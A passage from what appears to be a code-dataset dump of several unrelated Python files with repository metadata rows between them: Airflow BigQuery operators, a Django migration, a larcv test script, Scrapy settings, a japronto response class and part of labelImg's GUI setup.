super().__init__(**kwargs)
def execute(self, context) -> None:
bq_hook = BigQueryHook(
gcp_conn_id=self.gcp_conn_id,
delegate_to=self.delegate_to,
location=self.location,
impersonation_chain=self.impersonation_chain,
)
try:
bq_hook.create_empty_dataset(
project_id=self.project_id,
dataset_id=self.dataset_id,
dataset_reference=self.dataset_reference,
location=self.location,
exists_ok=self.exists_ok,
)
except Conflict:
dataset_id = self.dataset_reference.get("datasetReference", {}).get("datasetId", self.dataset_id)
self.log.info('Dataset %s already exists.', dataset_id)
class BigQueryGetDatasetOperator(BaseOperator):
template_fields = (
'dataset_id',
'project_id',
'impersonation_chain',
)
ui_color = BigQueryUIColors.DATASET.value
@apply_defaults
def __init__(
self,
*,
dataset_id: str,
project_id: Optional[str] = None,
gcp_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
self.dataset_id = dataset_id
self.project_id = project_id
self.gcp_conn_id = gcp_conn_id
self.delegate_to = delegate_to
self.impersonation_chain = impersonation_chain
super().__init__(**kwargs)
def execute(self, context):
bq_hook = BigQueryHook(
gcp_conn_id=self.gcp_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
self.log.info('Start getting dataset: %s:%s', self.project_id, self.dataset_id)
dataset = bq_hook.get_dataset(dataset_id=self.dataset_id, project_id=self.project_id)
return dataset.to_api_repr()
class BigQueryGetDatasetTablesOperator(BaseOperator):
template_fields = (
'dataset_id',
'project_id',
'impersonation_chain',
)
ui_color = BigQueryUIColors.DATASET.value
@apply_defaults
def __init__(
self,
*,
dataset_id: str,
project_id: Optional[str] = None,
max_results: Optional[int] = None,
gcp_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
self.dataset_id = dataset_id
self.project_id = project_id
self.max_results = max_results
self.gcp_conn_id = gcp_conn_id
self.delegate_to = delegate_to
self.impersonation_chain = impersonation_chain
super().__init__(**kwargs)
def execute(self, context):
bq_hook = BigQueryHook(
gcp_conn_id=self.gcp_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
return bq_hook.get_dataset_tables(
dataset_id=self.dataset_id,
project_id=self.project_id,
max_results=self.max_results,
)
class BigQueryPatchDatasetOperator(BaseOperator):
template_fields = (
'dataset_id',
'project_id',
'impersonation_chain',
)
template_fields_renderers = {"dataset_resource": "json"}
ui_color = BigQueryUIColors.DATASET.value
@apply_defaults
def __init__(
self,
*,
dataset_id: str,
dataset_resource: dict,
project_id: Optional[str] = None,
gcp_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
warnings.warn(
"This operator is deprecated. Please use BigQueryUpdateDatasetOperator.",
DeprecationWarning,
stacklevel=3,
)
self.dataset_id = dataset_id
self.project_id = project_id
self.gcp_conn_id = gcp_conn_id
self.dataset_resource = dataset_resource
self.delegate_to = delegate_to
self.impersonation_chain = impersonation_chain
super().__init__(**kwargs)
def execute(self, context):
bq_hook = BigQueryHook(
gcp_conn_id=self.gcp_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
return bq_hook.patch_dataset(
dataset_id=self.dataset_id,
dataset_resource=self.dataset_resource,
project_id=self.project_id,
)
class BigQueryUpdateTableOperator(BaseOperator):
template_fields = (
'dataset_id',
'table_id',
'project_id',
'impersonation_chain',
)
template_fields_renderers = {"table_resource": "json"}
ui_color = BigQueryUIColors.TABLE.value
@apply_defaults
def __init__(
self,
*,
table_resource: Dict[str, Any],
fields: Optional[List[str]] = None,
dataset_id: Optional[str] = None,
table_id: Optional[str] = None,
project_id: Optional[str] = None,
gcp_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
self.dataset_id = dataset_id
self.table_id = table_id
self.project_id = project_id
self.fields = fields
self.gcp_conn_id = gcp_conn_id
self.table_resource = table_resource
self.delegate_to = delegate_to
self.impersonation_chain = impersonation_chain
super().__init__(**kwargs)
def execute(self, context):
bq_hook = BigQueryHook(
gcp_conn_id=self.gcp_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
return bq_hook.update_table(
table_resource=self.table_resource,
fields=self.fields,
dataset_id=self.dataset_id,
table_id=self.table_id,
project_id=self.project_id,
)
class BigQueryUpdateDatasetOperator(BaseOperator):
template_fields = (
'dataset_id',
'project_id',
'impersonation_chain',
)
template_fields_renderers = {"dataset_resource": "json"}
ui_color = BigQueryUIColors.DATASET.value
@apply_defaults
def __init__(
self,
*,
dataset_resource: Dict[str, Any],
fields: Optional[List[str]] = None,
dataset_id: Optional[str] = None,
project_id: Optional[str] = None,
gcp_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
self.dataset_id = dataset_id
self.project_id = project_id
self.fields = fields
self.gcp_conn_id = gcp_conn_id
self.dataset_resource = dataset_resource
self.delegate_to = delegate_to
self.impersonation_chain = impersonation_chain
super().__init__(**kwargs)
def execute(self, context):
bq_hook = BigQueryHook(
gcp_conn_id=self.gcp_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
fields = self.fields or list(self.dataset_resource.keys())
dataset = bq_hook.update_dataset(
dataset_resource=self.dataset_resource,
project_id=self.project_id,
dataset_id=self.dataset_id,
fields=fields,
)
return dataset.to_api_repr()
class BigQueryDeleteTableOperator(BaseOperator):
template_fields = (
'deletion_dataset_table',
'impersonation_chain',
)
ui_color = BigQueryUIColors.TABLE.value
@apply_defaults
def __init__(
self,
*,
deletion_dataset_table: str,
gcp_conn_id: str = 'google_cloud_default',
bigquery_conn_id: Optional[str] = None,
delegate_to: Optional[str] = None,
ignore_if_missing: bool = False,
location: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
super().__init__(**kwargs)
if bigquery_conn_id:
warnings.warn(
"The bigquery_conn_id parameter has been deprecated. You should pass "
"the gcp_conn_id parameter.",
DeprecationWarning,
stacklevel=3,
)
gcp_conn_id = bigquery_conn_id
self.deletion_dataset_table = deletion_dataset_table
self.gcp_conn_id = gcp_conn_id
self.delegate_to = delegate_to
self.ignore_if_missing = ignore_if_missing
self.location = location
self.impersonation_chain = impersonation_chain
def execute(self, context) -> None:
self.log.info('Deleting: %s', self.deletion_dataset_table)
hook = BigQueryHook(
gcp_conn_id=self.gcp_conn_id,
delegate_to=self.delegate_to,
location=self.location,
impersonation_chain=self.impersonation_chain,
)
hook.delete_table(table_id=self.deletion_dataset_table, not_found_ok=self.ignore_if_missing)
class BigQueryUpsertTableOperator(BaseOperator):
template_fields = (
'dataset_id',
'table_resource',
'impersonation_chain',
)
template_fields_renderers = {"table_resource": "json"}
ui_color = BigQueryUIColors.TABLE.value
@apply_defaults
def __init__(
self,
*,
dataset_id: str,
table_resource: dict,
project_id: Optional[str] = None,
gcp_conn_id: str = 'google_cloud_default',
bigquery_conn_id: Optional[str] = None,
delegate_to: Optional[str] = None,
location: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
super().__init__(**kwargs)
if bigquery_conn_id:
warnings.warn(
"The bigquery_conn_id parameter has been deprecated. You should pass "
"the gcp_conn_id parameter.",
DeprecationWarning,
stacklevel=3,
)
gcp_conn_id = bigquery_conn_id
self.dataset_id = dataset_id
self.table_resource = table_resource
self.project_id = project_id
self.gcp_conn_id = gcp_conn_id
self.delegate_to = delegate_to
self.location = location
self.impersonation_chain = impersonation_chain
def execute(self, context) -> None:
self.log.info('Upserting Dataset: %s with table_resource: %s', self.dataset_id, self.table_resource)
hook = BigQueryHook(
bigquery_conn_id=self.gcp_conn_id,
delegate_to=self.delegate_to,
location=self.location,
impersonation_chain=self.impersonation_chain,
)
hook.run_table_upsert(
dataset_id=self.dataset_id,
table_resource=self.table_resource,
project_id=self.project_id,
)
class BigQueryUpdateTableSchemaOperator(BaseOperator):
template_fields = (
'schema_fields_updates',
'dataset_id',
'table_id',
'project_id',
'impersonation_chain',
)
template_fields_renderers = {"schema_fields_updates": "json"}
ui_color = BigQueryUIColors.TABLE.value
@apply_defaults
def __init__(
self,
*,
schema_fields_updates: List[Dict[str, Any]],
include_policy_tags: Optional[bool] = False,
dataset_id: Optional[str] = None,
table_id: Optional[str] = None,
project_id: Optional[str] = None,
gcp_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
**kwargs,
) -> None:
self.schema_fields_updates = schema_fields_updates
self.include_policy_tags = include_policy_tags
self.table_id = table_id
self.dataset_id = dataset_id
self.project_id = project_id
self.gcp_conn_id = gcp_conn_id
self.delegate_to = delegate_to
self.impersonation_chain = impersonation_chain
super().__init__(**kwargs)
def execute(self, context):
bq_hook = BigQueryHook(
gcp_conn_id=self.gcp_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
return bq_hook.update_table_schema(
schema_fields_updates=self.schema_fields_updates,
include_policy_tags=self.include_policy_tags,
dataset_id=self.dataset_id,
table_id=self.table_id,
project_id=self.project_id,
)
class BigQueryInsertJobOperator(BaseOperator):
template_fields = (
"configuration",
"job_id",
"impersonation_chain",
)
template_ext = (".json",)
template_fields_renderers = {"configuration": "json"}
ui_color = BigQueryUIColors.QUERY.value
@apply_defaults
def __init__(
self,
configuration: Dict[str, Any],
project_id: Optional[str] = None,
location: Optional[str] = None,
job_id: Optional[str] = None,
force_rerun: bool = True,
reattach_states: Optional[Set[str]] = None,
gcp_conn_id: str = 'google_cloud_default',
delegate_to: Optional[str] = None,
impersonation_chain: Optional[Union[str, Sequence[str]]] = None,
cancel_on_kill: bool = True,
**kwargs,
) -> None:
super().__init__(**kwargs)
self.configuration = configuration
self.location = location
self.job_id = job_id
self.project_id = project_id
self.gcp_conn_id = gcp_conn_id
self.delegate_to = delegate_to
self.force_rerun = force_rerun
self.reattach_states: Set[str] = reattach_states or set()
self.impersonation_chain = impersonation_chain
self.cancel_on_kill = cancel_on_kill
self.hook: Optional[BigQueryHook] = None
def prepare_template(self) -> None:
if isinstance(self.configuration, str) and self.configuration.endswith('.json'):
with open(self.configuration) as file:
self.configuration = json.loads(file.read())
def _submit_job(
self,
hook: BigQueryHook,
job_id: str,
) -> BigQueryJob:
job = hook.insert_job(
configuration=self.configuration,
project_id=self.project_id,
location=self.location,
job_id=job_id,
)
job.result()
return job
@staticmethod
def _handle_job_error(job: BigQueryJob) -> None:
if job.error_result:
raise AirflowException(f"BigQuery job {job.job_id} failed: {job.error_result}")
def _job_id(self, context):
if self.force_rerun:
hash_base = str(uuid.uuid4())
else:
hash_base = json.dumps(self.configuration, sort_keys=True)
uniqueness_suffix = hashlib.md5(hash_base.encode()).hexdigest()
if self.job_id:
return f"{self.job_id}_{uniqueness_suffix}"
exec_date = context['execution_date'].isoformat()
job_id = f"airflow_{self.dag_id}_{self.task_id}_{exec_date}_{uniqueness_suffix}"
return re.sub(r"[:\-+.]", "_", job_id)
def execute(self, context: Any):
hook = BigQueryHook(
gcp_conn_id=self.gcp_conn_id,
delegate_to=self.delegate_to,
impersonation_chain=self.impersonation_chain,
)
self.hook = hook
job_id = self._job_id(context)
try:
job = self._submit_job(hook, job_id)
self._handle_job_error(job)
except Conflict:
job = hook.get_job(
project_id=self.project_id,
location=self.location,
job_id=job_id,
)
if job.state in self.reattach_states:
job.result()
self._handle_job_error(job)
else:
raise AirflowException(
f"Job with id: {job_id} already exists and is in {job.state} state. If you "
f"want to force rerun it consider setting `force_rerun=True`."
f"Or, if you want to reattach in this scenario add {job.state} to `reattach_states`"
)
self.job_id = job.job_id
return job.job_id
def on_kill(self) -> None:
if self.job_id and self.cancel_on_kill:
self.hook.cancel_job(
job_id=self.job_id, project_id=self.project_id, location=self.location
)
| true | true |
1c2cbf15826a996a1947210df20821f4e3e41bb5 | 840 | py | Python | migrations/0021_auto_20160910_2144.py | jrandson/RememberTheCheese | 2d5d6752046650106bbf3e7e9c20c9efad9e700d | [
"MIT"
] | null | null | null | migrations/0021_auto_20160910_2144.py | jrandson/RememberTheCheese | 2d5d6752046650106bbf3e7e9c20c9efad9e700d | [
"MIT"
] | null | null | null | migrations/0021_auto_20160910_2144.py | jrandson/RememberTheCheese | 2d5d6752046650106bbf3e7e9c20c9efad9e700d | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2016-09-10 21:44
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('rememberTheCheese', '0020_auto_20160910_2140'),
]
operations = [
migrations.AlterField(
model_name='subtask',
name='deadline',
field=models.DateTimeField(default=datetime.datetime(2016, 9, 13, 21, 43, 59, 893406, tzinfo=utc), verbose_name='deadline'),
),
migrations.AlterField(
model_name='task',
name='deadline',
field=models.DateTimeField(default=datetime.datetime(2016, 9, 13, 21, 43, 59, 891576, tzinfo=utc), verbose_name='deadline'),
),
]
| 30 | 136 | 0.641667 |
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
dependencies = [
('rememberTheCheese', '0020_auto_20160910_2140'),
]
operations = [
migrations.AlterField(
model_name='subtask',
name='deadline',
field=models.DateTimeField(default=datetime.datetime(2016, 9, 13, 21, 43, 59, 893406, tzinfo=utc), verbose_name='deadline'),
),
migrations.AlterField(
model_name='task',
name='deadline',
field=models.DateTimeField(default=datetime.datetime(2016, 9, 13, 21, 43, 59, 891576, tzinfo=utc), verbose_name='deadline'),
),
]
| true | true |
1c2cbf4cdf2f8864641caba9691bf5de28a27646 | 1,643 | py | Python | src/larcv3/app/imagemod/test/test_CropROI.py | zhulcher/larcv3 | 26d1ad33f0c27ddf6bb2c56bc0238aeaddcb772b | [
"MIT"
] | 14 | 2017-10-19T15:08:29.000Z | 2021-03-31T21:21:07.000Z | src/larcv3/app/imagemod/test/test_CropROI.py | zhulcher/larcv3 | 26d1ad33f0c27ddf6bb2c56bc0238aeaddcb772b | [
"MIT"
] | 34 | 2019-05-15T13:33:10.000Z | 2022-03-22T17:54:49.000Z | src/larcv3/app/imagemod/test/test_CropROI.py | zhulcher/larcv3 | 26d1ad33f0c27ddf6bb2c56bc0238aeaddcb772b | [
"MIT"
] | 16 | 2017-12-07T12:04:40.000Z | 2021-11-15T00:53:31.000Z | from larcv import larcv
from colored_msg import colored_msg as cmsg
import os, sys
larcv.logger.force_level(0)
#
# Constants
#
MSG_LEVEL=larcv.msg.kERROR
if 'debug' in sys.argv:
MSG_LEVEL = larcv.msg.kDEBUG
if 'info' in sys.argv:
MSG_LEVEL = larcv.msg.kINFO
OUT_FNAME="croproi.root"
NUM_EVENT=1
ERROR_FILE_EXIST = 1
ERROR_WRITE_INIT = 2
if os.path.isfile(OUT_FNAME):
cmsg.error("Test output file (%s) already exists..." % OUT_FNAME)
sys.exit(ERROR_FILE_EXIST)
from larcv import larcv
o=larcv.IOManager(larcv.IOManager.kWRITE)
o.reset()
o.set_verbosity(MSG_LEVEL)
o.set_out_file(OUT_FNAME)
p = larcv.CropROI()
cfg = larcv.CreatePSetFromFile(sys.argv[1],"CropROI")
p.configure(cfg)
p.initialize()
if not o.initialize():
sys.exit(ERROR_WRITE_INIT)
for idx in xrange(NUM_EVENT):
img = larcv.Image2D(10,10)
for x in xrange(img.as_vector().size()):
img.set_pixel(x,x%3)
event_image1 = o.get_data(larcv.kProductImage2D,"original")
event_image1.Append(img)
event_image2 = o.get_data(larcv.kProductImage2D,"target")
event_image2.Append(img)
roi = larcv.ROI()
#ImageMeta(const double width=0., const double height=0.,
# const size_t row_count=0., const size_t col_count=0,
# const double origin_x=0., const double origin_y=0.,
# const PlaneID_t plane=::larcv::kINVALID_PLANE)
meta = larcv.ImageMeta(3,3,3,3,2,-2,0)
roi.AppendBB(meta)
event_roi = o.get_data(larcv.kProductROI,"roi")
event_roi.Append(roi)
o.set_id(0,0,idx)
p.process(o)
o.save_entry()
idx+=1
p.finalize()
o.finalize()
| 24.893939 | 69 | 0.685332 | from larcv import larcv
from colored_msg import colored_msg as cmsg
import os, sys
larcv.logger.force_level(0)
MSG_LEVEL=larcv.msg.kERROR
if 'debug' in sys.argv:
MSG_LEVEL = larcv.msg.kDEBUG
if 'info' in sys.argv:
MSG_LEVEL = larcv.msg.kINFO
OUT_FNAME="croproi.root"
NUM_EVENT=1
ERROR_FILE_EXIST = 1
ERROR_WRITE_INIT = 2
if os.path.isfile(OUT_FNAME):
cmsg.error("Test output file (%s) already exists..." % OUT_FNAME)
sys.exit(ERROR_FILE_EXIST)
from larcv import larcv
o=larcv.IOManager(larcv.IOManager.kWRITE)
o.reset()
o.set_verbosity(MSG_LEVEL)
o.set_out_file(OUT_FNAME)
p = larcv.CropROI()
cfg = larcv.CreatePSetFromFile(sys.argv[1],"CropROI")
p.configure(cfg)
p.initialize()
if not o.initialize():
sys.exit(ERROR_WRITE_INIT)
for idx in xrange(NUM_EVENT):
img = larcv.Image2D(10,10)
for x in xrange(img.as_vector().size()):
img.set_pixel(x,x%3)
event_image1 = o.get_data(larcv.kProductImage2D,"original")
event_image1.Append(img)
event_image2 = o.get_data(larcv.kProductImage2D,"target")
event_image2.Append(img)
roi = larcv.ROI()
meta = larcv.ImageMeta(3,3,3,3,2,-2,0)
roi.AppendBB(meta)
event_roi = o.get_data(larcv.kProductROI,"roi")
event_roi.Append(roi)
o.set_id(0,0,idx)
p.process(o)
o.save_entry()
idx+=1
p.finalize()
o.finalize()
| true | true |
1c2cc00dcbadfc3b16eb935075aa55c13af58b40 | 259 | py | Python | douban/douban/__init__.py | fourierrr/Crawler | 63abc990cf5d1ee8fd3027c9c5f609e98c4fa06b | [
"Apache-2.0"
] | null | null | null | douban/douban/__init__.py | fourierrr/Crawler | 63abc990cf5d1ee8fd3027c9c5f609e98c4fa06b | [
"Apache-2.0"
] | null | null | null | douban/douban/__init__.py | fourierrr/Crawler | 63abc990cf5d1ee8fd3027c9c5f609e98c4fa06b | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# @Author: Nessaj
# @Date: 2018-04-04 23:08:36
# @Last Modified by: Nessaj
# @Last Modified time: 2018-04-07 11:38:10
BOT_NAME = 'douban'
SPIDER_MODULES = ['douban.spiders']
NEWSPIDER_MODULE = 'douban.spiders'
DOWNLOAD_DELAY = 2
| 21.583333 | 42 | 0.675676 |
BOT_NAME = 'douban'
SPIDER_MODULES = ['douban.spiders']
NEWSPIDER_MODULE = 'douban.spiders'
DOWNLOAD_DELAY = 2
| true | true |
1c2cc134d84ed2afa98d398383c927965b9c3b0e | 1,183 | py | Python | src/japronto/response/py.py | devblack/japronto | 3016bd659047c76aa8f4431d304ba678d4c12a7f | [
"MIT"
] | 1 | 2021-08-18T05:42:12.000Z | 2021-08-18T05:42:12.000Z | src/japronto/response/py.py | devblack/japronto | 3016bd659047c76aa8f4431d304ba678d4c12a7f | [
"MIT"
] | null | null | null | src/japronto/response/py.py | devblack/japronto | 3016bd659047c76aa8f4431d304ba678d4c12a7f | [
"MIT"
] | null | null | null | _responses = None
def factory(status_code=200, text='', mime_type='text/plain',
encoding='utf-8'):
global _responses
if _responses is None:
_responses = [Response() for _ in range(100)]
response = _responses.pop()
response.status_code = status_code
response.mime_type = mime_type
response.text = text
response.encoding = encoding
return response
def dispose(response):
_responses.append(response)
class Response:
__slots__ = ('status_code', 'mime_type', 'text', 'encoding')
def __init__(self, status_code=200, text='', mime_type='text/plain',
encoding='utf-8'):
self.status_code = status_code
self.mime_type = mime_type
self.text = text
self.encoding = encoding
def render(self):
body = self.text.encode(self.encoding)
data = (
'HTTP/1.1 ', str(self.status_code), ' OK\r\n'
'Connection: keep-alive\r\n'
'Content-Type: ', self.mime_type, '; encoding=', self.encoding, '\r\n'
'Content-Length: ', str(len(body)), '\r\n\r\n',
)
return ''.join(data).encode(self.encoding) + body
| 26.886364 | 82 | 0.602705 | _responses = None
def factory(status_code=200, text='', mime_type='text/plain',
encoding='utf-8'):
global _responses
if _responses is None:
_responses = [Response() for _ in range(100)]
response = _responses.pop()
response.status_code = status_code
response.mime_type = mime_type
response.text = text
response.encoding = encoding
return response
def dispose(response):
_responses.append(response)
class Response:
__slots__ = ('status_code', 'mime_type', 'text', 'encoding')
def __init__(self, status_code=200, text='', mime_type='text/plain',
encoding='utf-8'):
self.status_code = status_code
self.mime_type = mime_type
self.text = text
self.encoding = encoding
def render(self):
body = self.text.encode(self.encoding)
data = (
'HTTP/1.1 ', str(self.status_code), ' OK\r\n'
'Connection: keep-alive\r\n'
'Content-Type: ', self.mime_type, '; encoding=', self.encoding, '\r\n'
'Content-Length: ', str(len(body)), '\r\n\r\n',
)
return ''.join(data).encode(self.encoding) + body
| true | true |
1c2cc168d3eec7f525221d461b8001bccd8f43a1 | 64,551 | py | Python | Tensorflow/labelImg/labelImg.py | KevzPeter/Signify-Sign-Language-Speech-Converter | facfbb33ab2540e26124e3ca96142caaa57480e3 | [
"MIT"
] | null | null | null | Tensorflow/labelImg/labelImg.py | KevzPeter/Signify-Sign-Language-Speech-Converter | facfbb33ab2540e26124e3ca96142caaa57480e3 | [
"MIT"
] | null | null | null | Tensorflow/labelImg/labelImg.py | KevzPeter/Signify-Sign-Language-Speech-Converter | facfbb33ab2540e26124e3ca96142caaa57480e3 | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import argparse
import codecs
import distutils.spawn
import os.path
import platform
import re
import sys
import subprocess
from functools import partial
from collections import defaultdict
try:
from PyQt5.QtGui import *
from PyQt5.QtCore import *
from PyQt5.QtWidgets import *
except ImportError:
# needed for py3+qt4
# Ref:
# http://pyqt.sourceforge.net/Docs/PyQt4/incompatible_apis.html
# http://stackoverflow.com/questions/21217399/pyqt4-qtcore-qvariant-object-instead-of-a-string
if sys.version_info.major >= 3:
import sip
sip.setapi('QVariant', 2)
from PyQt4.QtGui import *
from PyQt4.QtCore import *
from combobox import ComboBox
from libs.resources import *
from libs.constants import *
from libs.utils import *
from libs.settings import Settings
from libs.shape import Shape, DEFAULT_LINE_COLOR, DEFAULT_FILL_COLOR
from libs.stringBundle import StringBundle
from libs.canvas import Canvas
from libs.zoomWidget import ZoomWidget
from libs.labelDialog import LabelDialog
from libs.colorDialog import ColorDialog
from libs.labelFile import LabelFile, LabelFileError, LabelFileFormat
from libs.toolBar import ToolBar
from libs.pascal_voc_io import PascalVocReader
from libs.pascal_voc_io import XML_EXT
from libs.yolo_io import YoloReader
from libs.yolo_io import TXT_EXT
from libs.create_ml_io import CreateMLReader
from libs.create_ml_io import JSON_EXT
from libs.ustr import ustr
from libs.hashableQListWidgetItem import HashableQListWidgetItem
__appname__ = 'labelImg'
class WindowMixin(object):
def menu(self, title, actions=None):
menu = self.menuBar().addMenu(title)
if actions:
addActions(menu, actions)
return menu
def toolbar(self, title, actions=None):
toolbar = ToolBar(title)
toolbar.setObjectName(u'%sToolBar' % title)
# toolbar.setOrientation(Qt.Vertical)
toolbar.setToolButtonStyle(Qt.ToolButtonTextUnderIcon)
if actions:
addActions(toolbar, actions)
self.addToolBar(Qt.LeftToolBarArea, toolbar)
return toolbar
class MainWindow(QMainWindow, WindowMixin):
FIT_WINDOW, FIT_WIDTH, MANUAL_ZOOM = list(range(3))
def __init__(self, defaultFilename=None, defaultPrefdefClassFile=None, defaultSaveDir=None):
super(MainWindow, self).__init__()
self.setWindowTitle(__appname__)
# Load setting in the main thread
self.settings = Settings()
self.settings.load()
settings = self.settings
# Load string bundle for i18n
self.stringBundle = StringBundle.getBundle()
getStr = lambda strId: self.stringBundle.getString(strId)
# Save as Pascal voc xml
self.defaultSaveDir = defaultSaveDir
self.labelFileFormat = settings.get(SETTING_LABEL_FILE_FORMAT, LabelFileFormat.PASCAL_VOC)
# For loading all image under a directory
self.mImgList = []
self.dirname = None
self.labelHist = []
self.lastOpenDir = None
# Whether we need to save or not.
self.dirty = False
self._noSelectionSlot = False
self._beginner = True
self.screencastViewer = self.getAvailableScreencastViewer()
self.screencast = "https://youtu.be/p0nR2YsCY_U"
# Load predefined classes to the list
self.loadPredefinedClasses(defaultPrefdefClassFile)
# Main widgets and related state.
self.labelDialog = LabelDialog(parent=self, listItem=self.labelHist)
self.itemsToShapes = {}
self.shapesToItems = {}
self.prevLabelText = ''
listLayout = QVBoxLayout()
listLayout.setContentsMargins(0, 0, 0, 0)
# Create a widget for using default label
self.useDefaultLabelCheckbox = QCheckBox(getStr('useDefaultLabel'))
self.useDefaultLabelCheckbox.setChecked(False)
self.defaultLabelTextLine = QLineEdit()
useDefaultLabelQHBoxLayout = QHBoxLayout()
useDefaultLabelQHBoxLayout.addWidget(self.useDefaultLabelCheckbox)
useDefaultLabelQHBoxLayout.addWidget(self.defaultLabelTextLine)
useDefaultLabelContainer = QWidget()
useDefaultLabelContainer.setLayout(useDefaultLabelQHBoxLayout)
# Create a widget for edit and diffc button
self.diffcButton = QCheckBox(getStr('useDifficult'))
self.diffcButton.setChecked(False)
self.diffcButton.stateChanged.connect(self.btnstate)
self.editButton = QToolButton()
self.editButton.setToolButtonStyle(Qt.ToolButtonTextBesideIcon)
# Add some of widgets to listLayout
listLayout.addWidget(self.editButton)
listLayout.addWidget(self.diffcButton)
listLayout.addWidget(useDefaultLabelContainer)
# Create and add combobox for showing unique labels in group
self.comboBox = ComboBox(self)
listLayout.addWidget(self.comboBox)
# Create and add a widget for showing current label items
self.labelList = QListWidget()
labelListContainer = QWidget()
labelListContainer.setLayout(listLayout)
self.labelList.itemActivated.connect(self.labelSelectionChanged)
self.labelList.itemSelectionChanged.connect(self.labelSelectionChanged)
self.labelList.itemDoubleClicked.connect(self.editLabel)
# Connect to itemChanged to detect checkbox changes.
self.labelList.itemChanged.connect(self.labelItemChanged)
listLayout.addWidget(self.labelList)
self.dock = QDockWidget(getStr('boxLabelText'), self)
self.dock.setObjectName(getStr('labels'))
self.dock.setWidget(labelListContainer)
self.fileListWidget = QListWidget()
self.fileListWidget.itemDoubleClicked.connect(self.fileitemDoubleClicked)
filelistLayout = QVBoxLayout()
filelistLayout.setContentsMargins(0, 0, 0, 0)
filelistLayout.addWidget(self.fileListWidget)
fileListContainer = QWidget()
fileListContainer.setLayout(filelistLayout)
self.filedock = QDockWidget(getStr('fileList'), self)
self.filedock.setObjectName(getStr('files'))
self.filedock.setWidget(fileListContainer)
self.zoomWidget = ZoomWidget()
self.colorDialog = ColorDialog(parent=self)
self.canvas = Canvas(parent=self)
self.canvas.zoomRequest.connect(self.zoomRequest)
self.canvas.setDrawingShapeToSquare(settings.get(SETTING_DRAW_SQUARE, False))
scroll = QScrollArea()
scroll.setWidget(self.canvas)
scroll.setWidgetResizable(True)
self.scrollBars = {
Qt.Vertical: scroll.verticalScrollBar(),
Qt.Horizontal: scroll.horizontalScrollBar()
}
self.scrollArea = scroll
self.canvas.scrollRequest.connect(self.scrollRequest)
self.canvas.newShape.connect(self.newShape)
self.canvas.shapeMoved.connect(self.setDirty)
self.canvas.selectionChanged.connect(self.shapeSelectionChanged)
self.canvas.drawingPolygon.connect(self.toggleDrawingSensitive)
self.setCentralWidget(scroll)
self.addDockWidget(Qt.RightDockWidgetArea, self.dock)
self.addDockWidget(Qt.RightDockWidgetArea, self.filedock)
self.filedock.setFeatures(QDockWidget.DockWidgetFloatable)
self.dockFeatures = QDockWidget.DockWidgetClosable | QDockWidget.DockWidgetFloatable
self.dock.setFeatures(self.dock.features() ^ self.dockFeatures)
# Actions
action = partial(newAction, self)
quit = action(getStr('quit'), self.close,
'Ctrl+Q', 'quit', getStr('quitApp'))
open = action(getStr('openFile'), self.openFile,
'Ctrl+O', 'open', getStr('openFileDetail'))
opendir = action(getStr('openDir'), self.openDirDialog,
'Ctrl+u', 'open', getStr('openDir'))
copyPrevBounding = action(getStr('copyPrevBounding'), self.copyPreviousBoundingBoxes,
'Ctrl+v', 'paste', getStr('copyPrevBounding'))
changeSavedir = action(getStr('changeSaveDir'), self.changeSavedirDialog,
'Ctrl+r', 'open', getStr('changeSavedAnnotationDir'))
openAnnotation = action(getStr('openAnnotation'), self.openAnnotationDialog,
'Ctrl+Shift+O', 'open', getStr('openAnnotationDetail'))
openNextImg = action(getStr('nextImg'), self.openNextImg,
'd', 'next', getStr('nextImgDetail'))
openPrevImg = action(getStr('prevImg'), self.openPrevImg,
'a', 'prev', getStr('prevImgDetail'))
verify = action(getStr('verifyImg'), self.verifyImg,
'space', 'verify', getStr('verifyImgDetail'))
save = action(getStr('save'), self.saveFile,
'Ctrl+S', 'save', getStr('saveDetail'), enabled=False)
def getFormatMeta(format):
"""
returns a tuple containing (title, icon_name) of the selected format
"""
if format == LabelFileFormat.PASCAL_VOC:
return ('&PascalVOC', 'format_voc')
elif format == LabelFileFormat.YOLO:
return ('&YOLO', 'format_yolo')
elif format == LabelFileFormat.CREATE_ML:
return ('&CreateML', 'format_createml')
save_format = action(getFormatMeta(self.labelFileFormat)[0],
self.change_format, 'Ctrl+',
getFormatMeta(self.labelFileFormat)[1],
getStr('changeSaveFormat'), enabled=True)
saveAs = action(getStr('saveAs'), self.saveFileAs,
'Ctrl+Shift+S', 'save-as', getStr('saveAsDetail'), enabled=False)
close = action(getStr('closeCur'), self.closeFile, 'Ctrl+W', 'close', getStr('closeCurDetail'))
